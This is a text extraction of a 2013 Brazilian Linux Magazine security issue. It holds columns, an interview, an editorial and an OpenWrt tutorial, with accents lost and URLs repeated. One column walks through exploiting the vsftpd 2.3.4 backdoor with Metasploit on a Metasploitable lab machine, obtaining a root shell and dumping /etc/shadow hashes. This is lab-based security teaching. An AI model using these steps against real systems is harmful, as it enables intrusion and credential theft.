linux new mwdia - segurança

5/22/2018 Linux New Mwdia - Segurana

1/29

UBUNTU TOUCHP.67Desenvolva aplicativos etransforme seu dispositivo mvel

Segurana

MEDIALIN

WWW.LINUXMAGAZINE.COM.BR

A REVISTA DO PROFISSIONAL DE TI

# 106 Setembro 2013

MADDOG P.23Concurso para melhoriado desempenho do kernel

CEZAR TAURION P.26Cientista de Dados: oprofissional de Big Data

AUGUSTO CAMPOS P.10O curioso casodo Truecrypt

#106 09/13

R$ 14,90 7,50

9 771806 942009

0 0 1 0 6

ENTREVISTAp.23Entrevistamos Richard Collins, geren

de produtos da Canonical, que conto

as novidades do Ubuntu para Andro

EM TEMPOS ONDE OS SEGREDOS QUE VOC CONFIA AOSEU EMAIL E AOS SEUS SISTEMAS LOCAIS NO SO TOSECRETOS ASSIM, TODO CUIDADO POUCO P.32

Bate-papo seguro e criptografado P.34 Novos padres de segurana para SSL/TLS P.37

ZFS criptografado com Ubuntu P.42

Certificados pessoais auto-assinados P.47

MFT: Nova opo para transporte seguro de arquivos P.51

SEGURANAP.76Container chroot paraexecuo de programas perigosos

ANDROIDP.69Melhore a qualidadede som do seu Android

VEJA TAMBM NESTA EDIO: Monitoramento de sistemas com a ferramenta iftop P.54

Gerenciamento de configurao com Puppet P.57

Transforme um simples roteador em um servidor com OpenWrt P.60

Use o processador para assumir a tarefa dos clculos 3D P.72
http://www.lnm.com.br/article/8939http://www.lnm.com.br/article/8939http://www.lnm.com.br/article/8939http://www.lnm.com.br/article/8939http://www.lnm.com.br/article/8939http://www.lnm.com.br/article/8988http://www.lnm.com.br/article/8988http://www.lnm.com.br/article/8988http://www.lnm.com.br/article/8988http://www.lnm.com.br/article/8988http://www.lnm.com.br/article/8943http://www.lnm.com.br/article/8943http://www.lnm.com.br/article/8943http://www.lnm.com.br/article/8944http://www.lnm.com.br/article/8944http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8945http://www.lnm.com.br/article/8945http://www.lnm.com.br/article/8959http://www.lnm.com.br/article/8959http://www.lnm.com.br/article/8963http://www.lnm.com.br/article/8963http://www.lnm.com.br/article/8959http://www.lnm.com.br/article/8963http://www.lnm.com.br/article/8945http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8944http://www.lnm.com.br/article/8943http://www.lnm.com.br/article/8988http://www.lnm.com.br/article/8939


2/29


3/29

4 www.linuxmagazine.com.br

Do lado seguro 47

Klaus Knopper ensina uma forma simples de usar certificados

pessoais auto-assinados e criptografia digital.

Bate-papo seguro 34

Jitsi um programa de bate-papo verstil.

O programa Java pode lidar com todos os protocolos populares

de mensagens instantneas e at mesmo telefonia de vdeo por IP.

Novos padres 37

Numerosos ataques abalaram a segurana da criptografia SSL/

TLS nos ltimos anos. Novos padres poderiam remediar a

situao, mas ainda no so amplamente utilizados.

CAPASegredos bem guardados 32

Em tempos onde os segredos que voc confia ao seu email e aos

seus sitemas locais no so to secretos assim, todo cuidado pouco.

INDICE

Transporte seguro 51

Apesar do FTP ainda fazer um bom servio, se o usurio precisa enviar dados

sensveis, deve considerar a opo pela transferncia de arquivos gerenciados.

ZFS criptografado com Ubuntu 42

Neste artigo, mostraremos como usar a

criptografia de disco do Linux para instalar o

Ubuntu em um disco criptografado com ZFS.
http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8943http://www.lnm.com.br/article/8943http://www.lnm.com.br/article/8943http://www.lnm.com.br/article/8943http://www.lnm.com.br/article/8943http://www.lnm.com.br/article/8943http://www.lnm.com.br/article/8944http://www.lnm.com.br/article/8944http://www.lnm.com.br/article/8944http://www.lnm.com.br/article/8944http://www.lnm.com.br/article/8944http://www.lnm.com.br/article/8944http://www.lnm.com.br/article/8945http://www.lnm.com.br/article/8945http://www.lnm.com.br/article/8945http://www.lnm.com.br/article/8945http://www.lnm.com.br/article/8945http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8945http://www.lnm.com.br/article/8945http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8944http://www.lnm.com.br/article/8944http://www.lnm.com.br/article/8943http://www.lnm.com.br/article/8943


4/29

5Linux Magazine #106 | Setembrode 2013

| NDICELinux Magazine xxx

COLUNASColuna: Jon maddog Hall 23

Coluna Antonio Pdua 24

Coluna: Cezar Taurion 26

Entrevista: Richard Collins 28

Notcias 30

Raspberry Pi pode ser fabricado no Brasil

Empresas aumentam uso Linux para reduzir custos

CORPORATE

ANDROID

SERVIOS

Charly Khnast 07

Alexandre Borges 08

Augusto Campos 10

Kurt Seifried 11

Klaus Knopper 14

Zack Brown 17

Notcias 22

Corretagem na nuvem tendnciapara 2014

Google lana Coder, projeto de cdigolivre para Raspberry Pi

REDESTrfego assistido 54

O iftop uma ferramenta de linha de comando para monitoramento

de sistema que pode ajudar a identificar os problemas de largurade banda (bandwidth hogs) e manter o movimento de trfego.

SEGURANAPriso privada 76Virtualizar bom, mas s vezes pode ser um exagero,

se tudo o que o usurio quiser fazer for executar um

programa que poderia representar uma ameaa ao sistema.

O chroot jails oferece uma alternativa leve, rpida e bem testada.

Tubo grfico 72

A ideia simples: se o driver da placa grfica no oferece grficos 3D,

uma ajuda especial delegaria todos os clculos 3D ao processador

principal. Neste artigo, explicamos como fazer esse trabalho..

Editorial 03

Emails 06

Linux.local 78

Preview 82

Desenvolvimento para Ubuntu Touch 67

Aprenda a desenvolver aplicativos para o Ubuntu Touch e

torne seu dispositivo mvel em um computador Linux de bolso!

Manuteno automatizada 57

Se o usurio deseja que apenas suas tardes pertenamao trabalho, no precisa depender de gerenciamentode configurao. Mas necessrio perder a hora extraapenas para configurar um sistema de servidor?

TUTORIAL

Servidor de1 watt 60

Aprenda como instalar e configurar este novosistema operacional em seu dispositivo Android.

ANALISE

Aperte o play! 69

Os melhores aplicativos de msica e truques paramelhorar a qualidade de som do seu Android.
http://www.lnm.com.br/article/8939http://www.lnm.com.br/article/8982http://www.lnm.com.br/article/8988http://www.lnm.com.br/article/8990http://www.lnm.com.br/article/8990http://www.lnm.com.br/article/8990http://www.lnm.com.br/article/8990http://www.lnm.com.br/article/8990http://www.lnm.com.br/article/8990http://www.lnm.com.br/article/8990http://www.lnm.com.br/article/8926http://www.lnm.com.br/article/8932http://www.lnm.com.br/article/8927http://www.lnm.com.br/article/8937http://www.lnm.com.br/article/8989http://www.lnm.com.br/article/8989http://www.lnm.com.br/article/8989http://www.lnm.com.br/article/8989http://www.lnm.com.br/article/8989http://www.lnm.com.br/article/8989http://www.lnm.com.br/article/8989http://www.lnm.com.br/article/8989http://www.lnm.com.br/article/8959http://www.lnm.com.br/article/8959http://www.lnm.com.br/article/8959http://www.lnm.com.br/article/8959http://www.lnm.com.br/article/8959http://www.lnm.com.br/article/8963http://www.lnm.com.br/article/8963http://www.lnm.com.br/article/8963http://www.lnm.com.br/article/8963http://www.lnm.com.br/article/8963http://www.lnm.com.br/article/8963http://www.lnm.com.br/article/8963http://www.lnm.com.br/article/8959http://www.lnm.com.br/article/8989http://www.lnm.com.br/article/8937http://www.lnm.com.br/article/8927http://www.lnm.com.br/article/8932http://www.lnm.com.br/article/8926http://www.lnm.com.br/article/8990http://www.lnm.com.br/article/8988http://www.lnm.com.br/article/8982http://www.lnm.com.br/article/8939


5/29


Neste ms, sem muita demora, vamos utilizaro Metasploit de forma mais incisiva. Em nos-so ambiente, podemos utilizar o ambiente

de desenvolvimento j instalado no Ubuntu (para

o qual foi mostrado o procedimento de instalaona coluna anterior) ou ainda o Kali Linux [1], uma

mquina prpria para este tipo de teste (com Me-

tasploitable [2]) com endereo IP ... eum Windows XP SP com endereo IP ....Realizando o escananeamento destas mquinas

com Nessus ou OpenVAS, obtemos um nmero

significativo de vulnerabilidades e, quem sabe, boaparte delas explorveis. Por exemplo, escaneandoa mquina Metasploitable, descobre-se uma vul-nerabilidade crtica chamada vsftpd Smiley Face

Backdoor [3]e com esta informao poderemos

realizar uma explorao de modo bastante dire-

to. Digite msfconsolepara obter acesso ao console

do Metasploit e procure por um exploit para esta

vulnerabilidade em especfico:

msf> search 73573Matching Modules================ Name Disclosure Date Rank Description - - --

exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 00:00:00 UTC excellent VSFTPD

v2.3.4 BackdoorCommand Execution

Para saber mais sobre este ex-

ploit, proceda da seguinte forma:

msf exploit(vsftpd_234_backdoor) > info exploit/unix/ftp/vsftpd_234_backdoor

Selecione este exploit para uso e verificamos suas opes:

msf> use exploit/unix/ftp/vsftpd_234_backdoor msfexploit(vsftpd_234_backdoor) > show optionsModule options (exploit/unix ftp/vsftpd_234_backdoor): Name CurrentSetting Required Description - -- -- RHOST yes The target address RPORT 21 yes The target portExploit target: Id Name -- - 0 Automatic

Como o leitor pode notar, a mquina remota (a

ser explorada) no est especificada com seu en-

dereo IP e, alm disso, o nico tipo de alvo dispo-nvel Automatic o que facilita a nossa vida, ou

seja, o Metasploit determina automaticamente o

tipo do sistema operacional:

msf exploit(vsftpd_234_backdoor) > set RHOST

192.168.1.105RHOST => 192.168.1.105msf exploit(vsftpd_234_backdoor) > set TARGET 0TARGET => 0

necessrio escolher opayload(cdigo, backdoor,trojan etc.) a ser enviado para a mquina alvo uma

vez ela tenha sido explorada. Este passo essencial

j que o payload nos permite, muitas vezes, acesso

remoto mquina explorada (por exemplo, se esti-

vssemos executando um comando Netcat sendo

executado em modo de escuta). Portanto devemos

executar o comando:

msf exploit(vsftpd_234_backdoor) > show payloadsCompatible Payloads=================== Name Disclosure Date Rank Description - - -- cmd/unix/interact normal

Unix Command, Interact with Established Connection

para obter mais informaes sobre o payload, sele-

cion-lo para ser enviado para a mquina sob ataque

e ainda verificar quais so suas opes disponveis

(neste caso, no haver nenhuma opo):

Coluna do Alexandre

Metasploit parte 6Na coluna deste ms, aprenda como a efetivar um ataque bem sucedido

com Metasploit atravs de uma vulnerabilidade j conhecida.

por Alexandre Borges


6/29

9Linux Magazine #XX | Msde 200X

msf exploit(vsftpd_234_backdoor) > info cmd/unix/interactmsf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact payload => cmd/unix/interactmsf exploit(vsftpd_234_backdoor) > show optionsModule options (exploit/unix/ftp/vsftpd_234_backdoor): Name Current Setting Required Description - -- -- RHOST 192.168.1.105 yes The target address RPORT 21 yes The target portPayload options (cmd/unix/interact): Name Current Setting Required Description - -- --Exploit target: Id Name -- - 0 Automatic

FInalmente, somente nos resta realizar o ataque

propriamente dito:

msf exploit(vsftpd_234_backdoor) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)[*] USER: 331 Please specify the password.[+] Backdoor service has been spawned, handling...[+] UID: uid=0(root) gid=0(root)[*] Found shell.[*] Command shell session 3 opened(192.168.1.107:55485 -> 192.168.1.105:6200) at2013-09-15 18:56:55 -0300

uname -aLinux metasploitable 2.6.24-16-server #1 SMP Thu Apr10 13:58:00 UTC 2008 i686 GNU/Linuxiduid=0(root) gid=0(root)cat /etc/shadowroot:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::daemon:*:14684:0:99999:7:::bin:*:14684:0:99999:7:::sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD

9l0:14742:0:99999:7:::

Nunca foi to fcil! Quer quebrar

a senha? Use o John the Ripper [4].At o ms que vem.n

Mais informaes[1] Kali Linux: http://www.kali.org/

[2] Metasploitable 2:http://sourceforge.net/pro-jects/metasploitable/files/Metasploitable2/

[3] Vulnerabilidade vsftpd Smiley Face Backdoor:http://osvdb.org/73573

[4] Como quebrar senhas:http://alexandreborges.org/2013/08/05/introduction-to-password-cracking-part-1/

Alexandre Borges (linkedin: br.linkedin.com/in/alebor-ges) instrutor e especialista snior em sistemas ope-racionais Unix, Linux, Banco de Dados, Virtualizao,Cluster, Storage, Servidores, Backup, Desempenho e Se-gurana, alm de possuir profundo envolvimento comassuntos relacionados ao kernel Linux.
http://www.unodata.com.br/http://www.unodata.com.br/http://www.unodata.com.br/http://www.unodata.com.br/http://www.unodata.com.br/


7/29


OTruecrypt um utilitrio de criptografia de

disco popular na plataforma Windows, e dis-

ponvel tambm para Linux e Mac OS X. Ele

cria um disco criptografado em uma partio, um

disco inteiro (incluindo dispositivos removveis) oumesmo em uma unidade virtual mapeada a partir de

um arquivo comum.

Ele se diferencia de outras solues por ofere-

cer mecanismos que permitem buscar e manter

escondida a prpria existncia de um volume

criptografado e por oferecer diversas tcnicas de

acelerao para permitir gravar e acessar os dados

com velocidades que se aproximam do uso dos

mesmos dispositivos sem criptografia (dependen-

do da aplicao, claro). Alem disso, ele consegue

criptografar at mesmo o disco onde est instalado

o sistema operacional na plataforma Windows,

onde isso no to comum.

O cdigo-fonte do Truecrypt est disponvel,

mas os seus termos de licenciamento so um dos

aspectos que o tornam um caso curioso: por mais

que oferea as condies fun-

damentais de permiso de

uso, estudo, modificao e

redistribuio, a licena do

TrueCrypt inclui algumas

restries sui generis (por

exemplo, probe o uso e re-distribuio do software a

quem no compreender a

ntegra da licena) que at

hoje a impedem de ser

considerada free soft-

ware ou open source

(a ltima avaliao a

respeito foi em ou-

tubro de ), e

faz com que vrias

distribuies Linux no incluam o Truecrypt em

seus pacotes oficiais.

Outra questo que aumenta o status de curiosi-

dade que o executvel distribudo pelos autores

para uso em Windows tem algumas diferenas vi-sveis nas estruturas de dados, em relao a outras

plataformas, o que j despertou suspeitas de que

ele armazene e vaze chaves de seus usurios.

Essas suspeitas se ampliam porque at recentemente

ningum conseguia gerar um executvel igual ao ofi-

cial, partindo do cdigo-fonte oficial, o que ampliava

as teorias de que havia uma backdoor no executvel

para Windows. No final de outubro, entretanto, um

usurio empreendedor publicou seu passo-a-passo

para chegar a um executvel igual ao original, partindo

dos fontes oficiais. A receita complexa, e envolve at

mesmo usar uma verso de do compilador C++

mencionado na documentao, mas aparentemen-

te ningum acreditava que ela estivesse atualizada.

E para completar o status de curiosidade do

TrueCrypt: ningum sabe quem so seus autores.

Eles assinam o cdigo apenas coletivamente, com

nomes que variam: hoje TrueCrypt Foundation,

mas j foi TrueCrypt Developers Association, e ou-

tros nomes menos cotados. Para atividades que exi-

gem registro, eles variam estados e pases, desde

Nevada, nos EUA, at a Repblica Tcheca.

E se voc pensa que o importante o cdigoestar disponvel, pense de novo: difcil auditar

cdigo de criptografia, e exemplos de incluso de

backdoors no cdigo-fonte, mantendo-as difceis

de detectar, no faltam. No creio ser o caso, mas

tambm no descarto a possibilidade, a princpio.

Por enquanto, no mnimo, trato o TrueCrypt como...

um caso curioso. n

Coluna do Augusto

O curioso caso do TruecryptUma til e excelente ferramenta de criptografia de disco, continua

enfrentando problemas em seu licenciamento.

por Augusto Campos

Augusto Csar Campos administrador de TI e, desde 1996, mantm o site BR-linux.org,que cobre a cena do Software Livre no Brasil e no mundo.


8/29


Do desktop para

o smartphoneRichard Collins, gerente de produtos da Canonical,

oferece uma prvia do Ubuntu para Android.

por Kristian Kissling

Linux Magazine Qual o projeto

do momento para Ubuntu?

Richard Collins Sou responsvel

pelo Ubuntu para Android. Tambm

tenho trabalhado nos projetos do ta-blet Ubuntu e Ubuntu Phone.

LM J existe um Android:

livre, baseado em Linux e j est

estabelecido no mercado de

smartphones. Porque deveramos

escolher o Ubuntu?

RC O Ubuntu para Android uma

soluo que trabalha em conjunto com

o Android. O Android um sistema

operacional muito bem sucedido, que

proporciona uma excelente experincia

de telefonia mvel; no entanto, o An-

droid s verdadeiramente relevante

como um sistema operacional para

smartphone. Os servios e experin-

cias que funcionam bem no Android

s so projetados e otimizados para

um contexto mvel. Para smartphones

mais recentes que possuem a capaci-

dade de oferecer uma experincia de

desktop, com aplicativos e uma inter-

face de usurio quando conectados a

um monitor atravs de uma conexoHDMI, acreditamos que os usurios

desejem a capacidade total de um

sistema que projetado para desktop

e queiram utilizar os servios que fun-

cionam exatamente da mesma manei-

ra como usariam em seus laptops. O

Ubuntu um sistema operacional de

desktop bem estabelecido, compreen-

dido e usado; por isso, o Android no

pode entregar uma experincia de

desktop do mesmo nvel que o Ubuntu.LM Voc planeja instalar o Ubun-

tu em smartphones dual core como

desktops adicionais. E quanto segu-

rana? Como voc pretende proteger

dados privados, por exemplo, em caso

de perda ou roubo do smartphone?

RC O sistema de segurana ine-

rente ao Ubuntu no afetado. O sis-

tema operacional do Ubuntu funciona

de forma completamente nativa no

hardware e no h acesso ao sistema

Ubuntu a partir de qualquer servio

mvel Android. A soluo Ubuntu para

Android permitir aos usurios fazer

backup e salvar dados pessoais no

servio de nuvem Ubuntu One, e esta

uma maneira de manter os dados

pessoais separados do dispositivo, da

mesma maneira que qualquer outro

tipo de dispositivo que poderia estar

em risco de ser perdido ou roubado,

como um laptop.

Qualquer servio especfico de pro-teo de telefone melhor gerencia-

do a partir do sistema Android por

exemplo, bloquear e excluir dados

remotamente e desativar o telefone

dessa maneira tambm ir proteger

o usurio de ter seus dados pessoais

ou sensveis comprometidos.

Do ponto de vista da empresa, seo dispositivo est sendo usado para

conexo remota, h muitas solues

de segurana que a implementam

na camada do aplicativo, e uma vez

que j provaram funcionar muito

bem para o Ubuntu em laptops,

devem funcionar tambm para o

Ubuntu em smartphones.

LM O pessoal da Engadget

testou o Ubuntu para Android, e

achou o sistema bastante lento.

Qual hardware voc espera ser

executado no Ubuntu?

RC A entrevista com a Engad-

get foi baseada em um prottipo

utilizando o Motorola Atrix . A Ca-

nonical desenvolveu este prottipo

de forma independente, por isso o

desempenho ficou limitado s ca-

pacidades inerentes ao hardware.

Existe uma srie de possibilidades

para melhorar o desempenho do

produto e desde ento temos oti-mizado o sistema para executa-lo

de forma mais eficiente. Mas o mais

importante, ao desenvolvermos a

soluo Ubuntu para Android em

conjunto com um fabricante de

hardware, que o fabricante ter

Entrevista


9/29

29Linux Magazine #XX | Msde 200X

a oportunidade de propor novas

otimizaes e desempenho.

LM Voc j encontrou parcei-

ros oficiais de hardware para co-

operarem com o projeto? Quando

ser possvel adquirir o dispositivo?

RC As discusses ainda estoem andamento e esperamos anun-

ciar a disponibilidade do produto

dentro em breve.

LM H mais fornecedores pla-

nejando comercializar dispositivos

que possam lidar com o dual boot

Android e Ubuntu?

RC Para ser mais preciso, a so-

luo Ubuntu baseada no uso do

kernel Linux para executar dois siste-

mas operacionais ao mesmo tempo.Existem determinados requisitos de

hardware necessrios para suportar

o Ubuntu para Android, como CPU

multicore, e vemos que todos os

principais fabricantes de celulares

que baseiam seus sistemas em ar-

quiteturas ARM esto em processo

de anunciar aparelhos de ponta com

capacidades de CPU multicore.

LM Ser que este projeto tambm

visa colocar o Ubuntu em smartpho-

nes Android habituais, ou o foco est

apenas nos dispositivos dual boot?

RC A estratgia est focada empermitir que smartphones de ponta

possam executar o Android.

LM O cdigo estar disponvel

para os usurios utilizarem em

seus dispositivos?

RC No temos planos imedia-

tos de liberar o cdigo para que os

usurios o instalem em seus prprios

aparelhos, pois isso requer um co-

nhecimento tcnico muito espec-

fico, e a gama de aparelhos capazesde suportar Ubuntu para Android

ainda muito pequena. Tornar o

cdigo disponvel para download

de forma independente no serviria

a qualquer propsito real, uma vez

que extremamente difcil executar

a verso atual do software em um

dispositivo sem o suporte adequado

do fabricante do hardware.

LM Quantos membros da co-

munidade Ubuntu esto envolvidos

no projeto atualmente?

RC Dado que o projeto est em fase

de desenvolvimento, ainda um proje-to interno da Canonical nesta fase. Isto

porque o tipo de trabalho est focado

em atender diretamente aos fabrican-

tes de celulares; no entanto, medida

que conseguirmos mais sucesso com

o produto e ele seja implementado de

forma mais ampla, como um produto

de consumo, surgiro oportunidades

de trabalhar em estreita colaborao

com a comunidade.n

Gostou do artigo?Queremos ouvir sua opinio.Fale conosco em:[email protected]

Este artigo no nosso site:http://lnm.com.br/article/8938

A Linux Magazine oferece estas edies revisadase ampliadasdos livros que te preparam paraas Certificaes LPIC-1 e 2,com as seguintes

novidades:

Exerccios em todos os tpicos

Todo contedo ampliado para a nova verso da prova, atualizada em agosto/2012.

Garanta j os seus pelo site da Linux Magazinewww.linuxmagazine.com.br

LivrosparaCertificaoLPI-1e2!


10/29


Segredos bem guardadosEm tempos onde os segredos que voc confia ao seu email

e aos seus sistemas locais no so to secretos assim, todo cuidado pouco.

por Flvia Jobstraibizer

Segredos j so coisas difceis

de se confiar a algum (vide

a frase do filme ConAir: Eu

s confio em dois homens neste

mundo, um sou eu e o outro no voc.), imagine ento se os con-

fiamos sistemas e somos pegos

totalmente desprevenidos ao saberque nossas conversas, arquivos e

dados foram surrupiados (ou lidos

sem permisso) por sabe-se l quemem qualquer parte do mundo.

Pois o que frequentemente

vem sendo trazido tona pela

nova gerao Snowden: profis-

sionais que detinham em seu po-der informaes confidenciais dasmais diversas e que decidiram emalgum momento traz-las tona.Entre os membros dessa gerao

podemos citar WikiLeaks, o grupoAnonymous e outros ciberativistas.

sabido que temos de manter cer-to nvel de proteo aos dados que

armazenamos em nossos bancos dedados, sistemas e servidores e que,

mesmo assim, esses dados podem

ser coletados em algum momento

(lidos atravs de sniffers, copiados

por invasores ou sob outras formas).Mas talvez, tornar esses dados ile-

gveis ou ento muito difceis deserem decifrados seja um caminho

para evitar o roubo de informaes.Nesta edio da Linux Magazine

vamos falar sobre criptografia, esse ve-lho assunto j conhecido atualmenteat mesmo por leigos em informticapor figurar na lista dos dez principaisassuntos da atualidade (talvez depoisdo lanamento do game GTA V.

Voc vai aprender nas prximas

pginas como criar um sistema de

arquivos ZFS criptografado, evitan-do assim que eventuais informaesroubadas sejam lidas facilmente

pelo invasor (e consequentementedistribudas). Tambm vai aprendercomo gravar conversas telefnicas

atravs dos protocolos Jabber

e SIP com o aplicativo Jitsi e como

enviar arquivos de grande porte

com uma camada adicional de crip-tografia deixando de lado o velho

FTP e adotando o novo protocolo

MFT (Managed File Transfer).

Ainda nesta edio, no perca o

artigo que ir ensinar a criar e utilizar

assinaturas digitais e criptografia comSSL e para finalizar, saiba como resol-ver problemas com a encriptao dedados do protocolo TLS (antigo SSL).

As prximas pginas podem au-

xili-lo a evitar diversos problemas

se voc algum que possui (ou tra-

balha em uma empresa que possui)

informaes sigilosas armazenadas

e no quer v-las sendo exibidas pora por algum popular ciberativista daatualidade.

Boa leitura!n

Capa

Matrias de capa

Bate-papo seguro 34

Novos padres 41

ZFS criptografado com Ubuntu 34

Do lado seguro 47

Transporte seguro 51


11/29


Servidor de

1 watt

A

TP-Link [1] fabrica rotea-

dores em vrias classes de

desempenho. O TL-MR(figura 1) comercializado pelo

fabricante como um roteador

mvel, porque pequeno e leve.No entanto, ele no suporta G

(quadro 1), embora seja possvelatualiz-lo atravs da porta USB.Assim, o roteador destinado apessoas que no precisam de Gou possuem um dispositivo de

conexo UMTS e, portanto, no

desejam investir em um roteador

mvel UMTS caro. No entanto, ouso normal do roteador no ofoco deste artigo; em vez disso,descreveremos como convert-

lo em um mini servidor.Para fazer isso, substituiremos o

firmware existente pelo OpenWrt

[2], uma distribuio Linux especial

para microdispositivos. O OpenWrt

contempla um sistema de geren-

ciamento de pacotes que no de

forma alguma inferior ao das dis-tribuies clssicas; assim, apenasas limitaes do hardware podero

conter a criatividade do usurio.

O equipamentoO TL-MR bastante adequa-

do para este fim, por duas razes:por um lado, custa euros (ou dlares americanos) o que no muito, se acontecer do usurio bri-

car (danificar permanentemente

o sistema) do aparelho. Poroutro lado, o fabricante no

impe obstculos na instala-o de firmware de terceiros.

Para comear, baixe a verso

correta do OpenWrt [3]e siga

as breves (porm suficientes)instrues que vm com o roteador

para conectar-se interface web do

dispositivo. Quando chegar l, faa

o upload do novo firmware para oTL-MR, selecionando Upgradeno formulrio web (fgura 2).

Fazer o upload do firmware o ni-

co passo realmente crtico de todo oprocesso. Assim, antes de carregar aimagem, essencial verificar as pos-tagens na wiki do OpenWrt [3]e se-

guir as instrues

adequadas. De-

pois de instal-lo,o prximo passo a configuraobsica, particular-

mente para a rede.

Em seguida ser neces-

srio configurar uma srie de pacotes

de software que atualizam o suporteUSB para meios de dados (do tipo

pendrives ou discos rgidos).Esta etapa permite fazer o boot

do roteador a partir de um disco ex-

terno. No sistema de arquivos raiz,agora estendido, o usurio adiciona

mais pacotes de software do reposi-

trio OpenWrt para o aplicativo real.

Tutorial

Neste artigo, mostraremos como usar o OpenWrt para

liberar o roteador TL-MR3020 do firmware proprietrio

e convert-lo em um servidor conjunto para uma

rede domstica.

por Bernhard Bablok

Figura 1 O TL-MR3020 da TP-Link ( esquerda) no maior do quea palma da mo do usurio. O mini hub USB de Pearl (direita) atuacomo um expansor.


12/29


Primeiro contatoAps a atualizao do firmware ereboot do dispositivo, podemos co-

nectar o PC ou laptop ao roteador

com o uso de um cabo. Configure a

rede (normalmente podemos usaro gerenciador de rede para isso) efaa o login via Telnet em ...

(fgura 3). O roteador executa um ser-

vidor DHCP que fornece um ende-reo adequado para o PC ou laptop.

Neste ponto, devemos definir

uma senha para o root.O OpenWrt,

ento, desliga o servidor Telnet

por razes de segurana e inicia oservidor SSH. Em seguida, ajuste aconfigurao de rede para que o

roteador esteja na rede domstica;

siga em frente e adicione mais soft-

ware. Para mais informaes sobre o

sistema de configurao OpenWrt,

veja o quadro 2.Para usar o roteador como um

servidor na rede domstica, a con-figurao de rede deve se parecercom a listagem 1(/etc/config/network)

e listagem 2(/etc/config/wireless). As

linhas 9-15 na listagem 1configuram

a interface WLAN. Na listagem 2, a

linha 19garante que o servidor estejaintegrado rede como um clientede WLAN e no como um ponto de

acesso ou roteador.Aps o reboot, o dispositivo deve

ser encontrado no endereo de rede

configurado. Se no, o modo de

emergncia pode ajudar: durante o

processo de boot, pressione o boto

WPS to logo comece a piscar. Se o

LED piscar rapidamente, ligue-o no-

vamente. Agora o dispositivo estar

Figura 2O OpenWrt carregado como uma atualizao de firmwareatravs da interface web original no TL-MR3020.

Figura 3 Feito: O primeiro login no OpenWrt.

Listagem 1:/etc/config/network01# /etc/config/network---------------0203config interface 'loopback'

04option ifname 'lo'05option proto 'static'06option ipaddr '127.0.0.1'07option netmask '255.0.0.0'0809config interface 'wifi'10option proto 'static'11option ipaddr

'192.168.3.100'12option netmask

'255.255.255.0'13option gateway '192.168.3.1'14list dns '192.168.3.1'15list dns '8.8.8.8'


13/29


no modo Failsafe com o endereo

padro ... e executando odaemon Telnet. Podemos nos co-nectar ao Telnet e fazer as correes

necessrias. No entanto, nenhum

servidor DHCP est disponvel noroteador neste modo. Devemos

atribuir um endereo IP ao prpriocomputador manualmente.

Mais softwareA imagem do firmware original nocontm todos os componentes ne-cessrios para o funcionamentodo sistema de arquivos raiz em um

pendrive USB, assim, teremos que

adicion-los agora. Aps concluir comsucesso a configurao de rede, omini roteador pode acessar a Internet

e usar o sistema de gerenciamentode pacotes conveniente para instalar

software adicional retroativamente.

O ponto crucial o comandoopkg,

que precisamos executar comoroot.

Para fazer isso, primeiro chame opkgupdatepara atualizar a lista de pacotes.

Em seguida, instale os pacotes especi-

ficados usando o seguinte comando:

# opkg install

Se o usurio estiver procurando

por um pacote especfico, o subco-mando listgera uma lista de pa-cotes com descries breves. Paraa instalao USB, precisamos basi-camente de um conjunto de paco-tes do kernel (listagem 3). melhorparticionar e formatar o pendriveUSB (/dev/sdbna listagem podeser necessrio ajustar isso) no PC.Alm da partio raiz, desejvelmanter uma partio homee, acimade tudo, espao de swap.

Depois, podemos simplesmente

conectar o pendrive no roteador e

Figura 4 Usando a interface web no OpenWrt para recuperar o estado do sistema.

Quadro 1: Hardware

O TL-MR3020 uma pequena caixa de plstico branca(fgura 1) medindo 7,4 x 6,7x 2,2 centmetros e pesando apenas 60 gramas. Um conector USB mini usadopara a fonte de alimentao e o adaptador AC oferecido fornece 1 watt. Almdisso, o roteador tambm funciona sem problemas em uma porta USB. Alm dis-so, o TL-MR3020 inclui uma porta USB 2.0 e uma porta Ethernet RJ45 (100Mbps).A TP-Link fornece um curto cabo de extenso para esta ltima. No lado sem fio,o pequeno roteador suporta IEEE 802.11b/g/n em at 150Mbps.

O TL-MR3020 utiliza cinco LEDs para indicar o status, quatro dos quais podem

ser programados. H tambm um boto para a configurao sem fio via WPS eum desbloqueador com trs posies (3G/WISP/AP). Por dentro, o roteador possuiuma CPU ARM de 400MHz e 32MB de RAM. O sistema operacional reside em umchip de memria flash de 4 MB. A porta USB usada com o firmware original paraconectar um dispositivo de conexo UMTS para operao como um roteador 3Gmvel. Sem um pendrive, o dispositivo funciona como um ponto de acesso sem fio.

Como uma adio til ao TL-MR3020, recomendamos um hub USB mini Pearl(fgura 1). Este dispositivo integra um leitor de micro-SDHC e, portanto, forneceo sistema de arquivos raiz avanado descrito neste artigo em um carto de me-mria, sem bloquear a porta USB.

A placa do roteador contm portas adicionais, mas o TP-Link no faz o roteamentodelas. Se o usurio usar um ferro de solda poder anexar outros componentes, comoum console serial, uma interface I2C ou uma antena externa. A wiki do OpenWrtapresenta algumas fotos e links para instrues relevantes sobre o TL-MR3020[3].

Listagem 2: /etc/config/wireless01# /etc/config/wireless ----------0203config wifi-device radio004option type mac8021105option channel 1106option macaddr 90:f6:52:e6:d7:b207option hwmode 11ng08option htmode HT20

09list ht_capab SHORT-GI-2010list ht_capab SHORT-GI-4011list ht_capab RX-STBC112list ht_capab DSSS_CCK-4013# REMOVE THIS LINE TO ENABLE WIFI:14# option disabled 11516config wifi-iface17option device radio018option network wifi19option mode sta20option ssid 'my-ssid'21option encryption psk222option key 'secret'


